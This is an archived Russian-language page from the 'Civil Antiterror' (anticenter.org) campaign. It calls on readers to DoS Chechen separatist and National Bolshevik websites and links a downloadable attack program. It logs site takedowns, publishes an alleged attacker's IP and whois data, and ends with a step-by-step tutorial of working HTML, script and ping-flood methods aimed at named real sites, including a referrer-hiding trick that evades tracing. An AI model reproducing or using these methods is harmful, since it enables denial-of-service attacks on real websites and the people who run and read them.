История DoS-сети "Anticenter - Antiterror"

Материал из CompromatWiki
Перейти к: навигация, поиск


История DOS-сети "Anticenter - Antiterror"

Публичная деятельность anticenter.org была прекращена в начале 2006 года. Сайт удален

Оригинал этого материала
© "Гражданский антитеррор", origindate::06.06.2007

Converted 24291.jpg

Испытания DOS-сети "Anticenter - Antiterror"

Вот уже несколько недель, как проходят тестовые испытания нашей DOS-сети (подробности о сети мы раскрывать не будем), с помощью которой планируется атаковать сайты чеченских экстремистов. Именно благодаря DOS-сети удалось совершить ряд успешных атак на "зеркала" "Чеченпресс" и сайт daymohk.org. Огромную лепту в дело внесли и продолжают вносить наши уважаемые посетители, скачавшие, предлагаемые ниже программы для DOS-атак.

Тесты сети продолжаются, однако, сеть уже работает и наносит существенный ущерб всем "зеркалам" сайта "Чеченпресс", доступ к которым, благодаря атакам наших посетителей и DOS-сети, сильно затруднен (возможно, не для всего мира, но для большинства посетителей).

Разумеется, в Интернете всегда найдется, что противопоставить нашей сети, как и любой другой, мы не пытаемся никого уверить, что наша сеть будет работать всегда и успешно, мы лишь доводим до сведения наших уважаемых посетителей, что на данный момент DOS-сеть работает и вполне успешно справляется со своими задачами. Однако вряд ли DOS-сеть смогла бы добиться значительных успехов без народных атак, которые люди совершают с помощью программ, распространяемых на этом сайте. 
Мы по-прежнему предлагаем всем посетителям нашего сайта скачать программу для атаки на сайт chechenpress.info и программу для атаки на сhechenpress.net

Акции активистов "Гражданского антитеррора" и их последствия:

13 декабря закрыт сайт www.xvvm.narod.ru, на котором распространялись материалы о том, как изготовить взрывное устройство.

Кроме того, закрыт протеррористический сайт www.hamdalla.narod.ru

12 декабря закрыто "зеркало" сайта Клинского отделения НБП - www.nbp-klin.narod.ru, а также, сайт, на котором размещались различные пособия по изготовлению взрывных устройств - www.anarx.narod.ru

"Гражданский антитеррор" заявляет, что продолжит преследование сайтов, содержащих рецепты изготовления взрывных устройств. Поэтому, мы предлагаем владельцам ресурсов, на которых содержатся подобные материалы, удалить их со своего сайта, во избежании его закрытия.

Кроме этого, продолжаются акции по пресечению деятельности протеррористических ресурсов. DOS-сеть продолжает атаки на chechenpress.info. Доступ к сайту по-прежнему затруднен.

8 декабря закрыт сайт Краснодарского отделения "Национал-Большевистской партии" - www.nbk.nm.ru. Помимо материалов экстремистского содержания, на сайте размещалась статья о том, как изготовить взрывное устройство.

Остаются проблемы и у сайта "Чеченпресс", который находится под непрерывной атакой нашей DOS-сети и наших посетителей, которые скачали специальную программу для атак.

6 декабря закрыт сайт www.whitepride.hut1.ru, посвященный движению "бритоголовых". 
Остаются проблемы (искуственно созданные) у сайта "Чеченпресс".

5 декабря большую половину дня был недоступен сайт chechenpress.info. Значительно был затруден доступ и к последнему "зеркалу" сайта.

4 декабря закрыт форум ihvani.5dom.net, посвященный шахидам и террористическому бандподполью ("джамаату"). Кроме этого, сильно затруднен был доступ к "зеркалам" сайта "Чеченпресс".

2 декабря закрыт сайт www.chenetworld.com, на котором обсуждались и планировались хакерские атаки против нашего ресурса - Anticenter.org, а также ресурсов наших единомышленников. Кроме этого, сайт имел явную протеррористическую направленность.

P.S. В закрытии сайта, наравне с нами, принимали участие и наши единомышленники.

2 декабря закрыт сайт imam-tk.fastbb.ru, посвященный чеченским боевикам.

1 декабря закрыт сайт Карельского отделения "Национал-Большевистской партии" - nbpkarel.nm.ru

1 декабря в результате действий Дос-хакеров "Гражданского антитеррора", большие проблемы возникли у очередного "зеркала" "Чеченпресс" - chechenpress.net

Кроме того, в последние часы наблюдаются сбои в работе последнего "зеркала" - chechenpress.info, который подвергается народным атакам.

По-прежнему, призываем всех наших посетителей скачать программу для атак на последнее "зеркало" - chechenpress.info

30 ноября акция, проводимая сайтом Anticenter.org: "Уничтожь Чеченпресс", в ходе которой всем желающим поучаствовать в атаке на сайт chechenpress.org выдавалась программа -http://www.kouzdra.ru/anticenter.org/chechenpress1.rar , увенчалась успехом.

Несколько дней подряд, заходя на chechenpress.org, Вы могли видеть следующую надпись:

Sorry, this site is temporarily unavailable 
Daily Bandwidth Exceeded 
PowWeb Hosting Offers 10GB/Day!

2 декабря на chechenpress.org был поставлен автоматический переадресовщик на другое "зеркало" сайта, что фактически означает, что хозяева "Чеченпресс" признали свое бессилие перед атаками на chechenpress.org, и убрав оттуда весь контент сайта, просто поставили переадрессовщик на другое, более крепкое "зеркало".

"Гражданский антитеррор" призывает продолжать скачивать программу для атаки и атаковать с ее помощью chechenpress.org, а также, скачивать программу для атаки на последнее "зеркало" сайта "Чеченпресс", которое несколько дней назад уже имело большие проблемы. 
В среднем, минута атаки данной программой отнимает у сайта-мишени 3 мегабайта (если не менять ее изначальные настройки).

29 ноября закрыт www.imam555.fastbb.ru - еще одно "зеркало" форума www.abudjunud.fastbb.ru, которое открылось только сегодня. Мы внимательно отслеживаем появление новых "зеркал", как этого сайта, так остальных сайтов, нарушающих закон, и, по возможности, с помощью хостинг-провайдеров, будем закрывать их.

28 ноября закрыт форум - www.simakonline.fastbb.ru - это наиболее одиозный протеррористический форум, к созданию которого имели отношение люди с сайта "Кавказ-Центр". На вышеуказанном форуме, помимо пробасаевски настроенных персон, общались люди, причастные к финансированию чеченских бандформирований. Кроме того, форум изобиловал материалами экстремистского толка и перепечатками материалов с сайтов "Кавказ-Центр" и "Чеченпресс".

28 ноября закрыт форум, посвященный "джихаду" - www.abudjunud.fastbb.ru, а также, открывшееся в этот же день его "зеркало" - www.imamforum.fastbb.ru

28 ноября закрыт сайт ahmadov.fastbb.ru (бывш. ramazan.h16.ru)

23 ноября закрыт сайт ramazan.h16.ru (бывш. ramzan.h16.ru)

22 ноября закрыто последнее "зеркало" экстремистской газеты "Para bellum" - parabellum.nm.ru

20 ноября закрыт протеррористический ресурс - nizam.nm.ru 
Помимо нас над закрытием вышеуказанного ресурса работали и независимые энтузиасты, за что им большое спасибо!

18 ноября закрыт сайт ahmadov.by.ru (бывш. www.ramzan.h16.ru)

16 ноября закрыт сайт Клинского отделения Национал-Большевистской партии - nbp-klin.h15.ru

15 ноября закрыт сайт, посвященный "джихаду" против России, "шахидам" и терроризму- ramzan.h16.ru

14 ноября закрыты сайты: www.nbp-tambov.nm.ru (Сайт регионального отделения НБП) и www.nbp74.nm.ru (Газета Para Bellum).

11 ноября закрыт русофобский и протеррористический сайт farukislam.narod.ru

10 ноября закрыт "форум о шахидах", располагавшийся на сайте ahmadov.5dom.net.

9 ноября совершена атака на сайт "Общество друзей Ичкерии" (marsho.net). В результате атаки сайт и все его поддомены долгое время (почти месяц) были недоступны.

О более ранних акциях Вы можете узнать из раздела "Архив акций"

Народная акция: Уничтожь "Чеченпресс"!:

Призываем наших посетителей принять участие в новой Dos-атаке на протеррористический сайт "Чеченпресс". Что для этого нужно? 
Скачайте программу, извлеките из rar-архива и запустите ее. Подробную инструкцию по ее эксплуатации, тех.требованиям и законности мероприятия Вы найдете внутри архивного файла. 
Если с помощью данной программы примерно в одно время, в один день, начнут атаку хотя бы 10-20 человек, то сайт-мишень "Чеченпресс" будет выведен из строя.

Призываем всех заинтересованных лиц начать атаки на сайт в период с 21 по ноября по 5 декабря, а также принять активное участие в распространении данной программы через своих знакомых и через различные форумы. Чем большее количество людей будет вовлечено в атаку, тем больше шансов уничтожить протеррористический сайт.

P.S. ВНИМАНИЕ! Обязательно ознакомьтесь с инструкцией по применению программы (инструкция вложена в архивный файл).

Экстремист "из кожи лезет", а толку никакого:

Приспешники лживых экстремистских ресурсов не оставляют попыток уничтожить сайт anticenter.org. 
Последняя попытка ликвидировать ресурс пришлась на 27 ноября. В этот день на anticenter.org была совершена хакерская атака с территории Бельгии. Впрочем, атака практически не отразилась на работе сайта. Были лишь зафиксированы незначительные перебои в вещании в течении нескольких часов. К 16:00 мск хакерская атака была блокирована, а IP-адрес, с которого столь бездарная атака была совершена, мы, чтобы другим неповадно было, выставляем напоказ:

IP - 81.245.69.76. Расшифровка: 
inetnum: 81.245.64.0 - 81.245.79.255 
netname: BE-BELGACOM-ADSL1 
descr: ADSL-GO-PLUS 
descr: Belgacom ISP SA/NV 
country: BE 
admin-c: SN2068-RIPE 
tech-c: SN2068-RIPE 
rev-srv: ns1.skynet.be 
rev-srv: ns2.skynet.be 
rev-srv: ns3.skynet.be 
rev-srv: ns4.skynet.be 
status: ASSIGNED PA 
mnt-by: SKYNETBE-MNT 
mnt-by: SKYNETBE-ROBOT-MNT 
source: RIPE # Filtered

route: 81.244.0.0/14 
descr: SKYNETBE-CUSTOMERS 
origin: AS5432 
mnt-by: SKYNETBE-MNT 
source: RIPE # Filtered

Напомним, что это уже вторая по счету попытка закрыть сайт "Гражданского антитеррора" - anticenter.org. Первая попытка была предпринята 25 ноября с помощью письма-жалобы хостинг-провайдеру host.com.ua, на сервере которого был расположен наш сайт.

В вину нашему сайту вменялось распространение хакерской программы (для атак на противозаконный ресурс "Чеченпресс") и публикацию на сайте html-кодов, с помощью которых любой интернет-пользователь может создать определенные проблемы протеррористическим ресурсам.

Несмотря на то, что вопросы закрытия сайта, расположенного на платном хостинге, должны решаться только в рамках судебного процесса, наш хостинг-провайдер host.com.ua, видимо чего-то испугавшись, сразу же после письма-жалобы, приостановил деятельность нашего ресурса. Однако, сайт уже через несколько часов после закрытия возобновил свою работу.

Приспешники экстремистских сайтов никак не могут понять, что закрыть можно сайты экстремистов, а сайты российских патриотов, к коим относится и anticenter.org, закрыть невозможно.

"Гражданский антитеррор" - www.anticenter.org продолжает свою работу по пресечению деятельности экстремистских сайтов в Интернете и призывает своих посетителей поучаствовать в атаках на сайты экстремистов (о том, как это сделать, читайте ниже).

Немного о "Гражданском антитерроре"

Наше сообщество, состоящее из простых граждан- патриотов России, было создано в конце августа 2005 года для борьбы с сайтами чеченских боевиков, которые, несмотря ни на какие официальные протесты со стороны России, продолжают свою работу на зарубежных серверах.

Сайты боевиков сеют зло и ненависть в души людей, массово дезинформируют и искажают факты, способствуя эскалации экстремистской деятельности в России.

Главной целью нашей нашего сообщества является полное уничтожение сайтов, пропагандирующих террор и насилие, искажающих факты и бесстыдно лгущих своему читателю.

В число таких сайтов входят: 
1.Kavkazcenter.com (и все его "зеркала") 
2.Daymohk.info 
3.Chechenpress.org (и все его "зеркала") 
4.Marsho.dk 
5.Kavkazchat.com

14 ноября, за день до решения Верховного суда РФ о запрещении Национал-Большевистской партии, мы начали преследование и российских националистических проектов.

***

Как уничтожить сайты экстремистов, не имея специального оборудования для атак

Многие жители различных стран мира устали от лжи и дезинформации, которая распространяется так называемыми "СМИ" несуществующей республики "Ичкерия". 
Теперь помешать нормальной работе этих "СМИ" и даже вывести их из строя может каждый. Ниже приведены всевозможные варианты для атак на экстремистские сайты. 
Если у Вас есть свои идеи по этому поводу, пишите по почте, мы их обязательно опубликуем.

В данный период времени весьма актуально направить нижеуказанные коды против сайта http://chechenpress.org или shamilonline.org т.к. сайт "Кавказ-Центр" с помощью данных кодов атаковать сложно.

Способ №1 

Многие хотят поучаствовать в акции, но не имеют своих веб-ресурсов. 
Вы можете внести свой посильный вклад очень простым способом. Сделайте сами и друзьям расскажите. 
Открываете любой текстовый редактор, вставляете в него следующий код: 
<img src=http://www.chechenpress.org/baners/l_ban.gif style=display:none>

сохраняете его на диске как blank.html

Идете в свойства браузера (сервис>свойства) и ставите этот файл в качестве стартовой страницы:

file:///С:/blank.html

Теперь при каждом нажатии на кнопку "домой" вы будете дергать вражеский сервер.
Представьте, сколько раз за день вы открываете браузер или жмете эту кнопку 
если 10 тысяч человек проделают это на своих компьютерах, то сервер будет иметь сотни тысяч пустых запросов ежедневно. Отсечь такую атаку невозможно.

Самые отчаянные могут поставить такой код:

<script>
function go(){
location.href="blank.html";
}
</script>
<body onload=go()>
<img src=http://www.chechenpress.org/baners/l_ban.gif style=display:none>

Один компьютер за минуту сгенерит сотни запросов.

Совет взят с форума "p4p"

Способ №2 

Копируем отсюда в блокнот следущий текст:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> 
<meta http-equiv="Refresh" content="1"> 
<meta http-equiv="Cache-Control" content="no-cache, must-revalidate"> 
<meta http-equiv="pragma" content="no-cache"> 
<html> 
<frameset rows="1"> 
<frame src="http://www.chechenpress.org/baners/l_ban.gif" hight="10%" frameborder="1"> </frameset> 
</html>

Сохраняем его на диске под любым именем, например, kavkaz.txt, затем в проводнике переименовываем в kavkaz.html и открываем 
<meta http-equiv="Refresh" content="1"> - Refresh обязывает браузер обновлять содержимое через content="1" секунд (в данном случае через 1 сек). 
<meta http-equiv="Cache-Control" content="no-cache, must-revalidate"> - говорит браузеру, чтобы содержимое считывалось, а не вытаскивалось из кеша.

Такой скрипт дает возможность, не прикладывая никаких усилий, создавать искуственную нагрузку на сайт экстремистов, в данном случае, на "Чеченпресс".

Способ №3 

Для Windows 2000/XP кнопка Пуск -> Программы -> Командная строка. В черном окне вбить команду: 
ping chechenpress.org -t -l 5000 
Нажать Enter и сбросить окно вниз. Трафик сайт получит. Если вы платите за трафик, то и вы тоже. 
Правда, в некоторых случаях подобная атака блокируется еще на уровне провайдера, но не всегда.

Способ №4 (если у Вас есть свой сайт) 

Объясним смысл хотлинка и способ его проведения через протокол about: 
Хотлинк - это загрузка како-го либо файла с сервера жертвы на атакующем сервере

Для чего нужен хотлинк? 
Для того, что бы создать нагрузку либо на канал атакуемого сервера либо на сам сервер.

Есть 2 способа хотлинка: 
a) Можно разместить на своих сайтах код, загружающий какую-то увесистую картинку с сайта жертвы: 
<img src=http://site.com/image.gif>. 
Что бы не показывать эту картинку вашим серферам, проставим размеры в 1 пиксель: 
<img src=http://site.com/image.gif width=1 height=1> 
Для солидности, можем запретить показ картинки на вашей странице с помощью стилей: 
<img src=http://site.com/image.gif width=1 height=1 style=display:none> 
При таком подходе каждый срефер, зашедший на ваш сайт, загрузит картинку с атакуемого сервера, но не увидит ее. 
Что имеем? Имеем загрузку канала атакуемого сервера. Траффик стоит денег, соответсвенно у жертвы растут счета за хостинг. Если у жертвы канал не толстый, то при большом количестве запросов произойдет пробка и к серверу пробиться станет сложно. Но это не наш метод. Переходим к способу "б"

б) Запрашивать нужно не картинки а "тяжелые" скрипты. Скрипты, требующие обращения к базам данных или больших вычислительных мощностей. Обычно на сайтах типа КЦ скрипты не оптимизированны под большие нагрузки. Большое количество запросов к таким скриптам загрузит процессор атакуемого сревера, забьет логами жесткий диск и т.д. В результате сервер просто умрет, хотя канал до сервера будет загружен не очень сильно.

Пример: 
<img src=http://site.com/script.php width=1 height=1 style=display:none> 
В таком варианте атакуемый сервер получает запрос на выполнение срипта и выполняет его, но так, как запрашиваем мы через тег <img src>, а возвращаемый результат не является картинкой, то на нашем сайте будет показана иконка "битой картинки". Загнав эту иконку в 1х1 пиксель и прикрыв стилями (style=display:none) мы избавим наших серферов от просмотра "битой" графики. Они просто ничего не заметят

Для увеличения нагрузки на сервер можно хотлинковать сразу 5-10-20... скриптов. Просто увеличиваем количество "картинок":

<img src=http://site.com/script1.php width=1 height=1 style=display:none> 
<img src=http://site.com/script2.php width=1 height=1 style=display:none> 
<img src=http://site.com/script3.php width=1 height=1 style=display:none>

Лучше всего ставить эти код вниз своих страниц, что бы серферу не пришлось ждать загрузки вашей информации. Он сперва получит то, за чем пришел и попутно дернет жертву. 
Подход всем хорош, за исключением того, что эти запросы могут быть обращены против атакующего. При получении запроса к картинке или скрипту, сервер может проверить поле HTTP_REFERRER и если в этом указано, что запрос пришел с атакующего сайта, средиректить его обратно, на какой-либо из ваших собственных скриптов. В итоге вы будете грузить сами себя. 
Что бы этого не произошло мы несколько усложним конструкцию. 
В IE имеется протокол "about:". Пример - ваша стартовая страница about:blank. 
В версиях IE до XPSP2 и некоторых патчей для SP1 работает следущая фича: 
При добавлении любого символа после двоеточия в about:, этот символ выводится на странице. 
например about:1 - выведет на странице единицу.

about:<script>alert()</script> - выведет в теле страницы код скрипта и исполнит его.

about:<img src=http://site.com/image.gif> - выведет на странице картинку. 
about:<img src=http://site.com/script1.php width=1 height=1 style=display:none> 
- дернет скрипт на чужом сервере, создав нагрузку.

Самое главное: поле HTTP_REFERRER при этом останется пустым, т.к. выполняется это всё на локальной машине. Соответсвенно вернуть вам ответку атакуемый не сможет. Он будет видеть запросы, но источник атаки он не обнаружит. 
И так доводим код до ума и вызываем протокол about: в ифрейме. 
<iframe src="http://compromat.ru/files/converted_24292.gif>" width=0 height=0> 
Продублировав такой код 10 раз и изменив имена вызываемых скриптов вы заставите каждого посетителя вашего сайта 10 раз дернуть вражеский сервер. 
Хотлинковать лучше всего тяжелые скрипты, например топики на форумах, поисковые запросы, или картинки. 
http://www.chechenpress.org/baners/l_ban.gif 
kavkazchat.com 
Просто скопируйте URL топиков в буфер обмена и замените нужные фрагменты кода. 
P.S. Этот протокол пропатчен M$ примерно год назад. Эти конструкции будут работать процентах на 40-50 машин, на тех, где не стоит SP2. 
Остальные, пропатченные пользователи просто ничего не заметят. 
Совет взят с форума "p4p"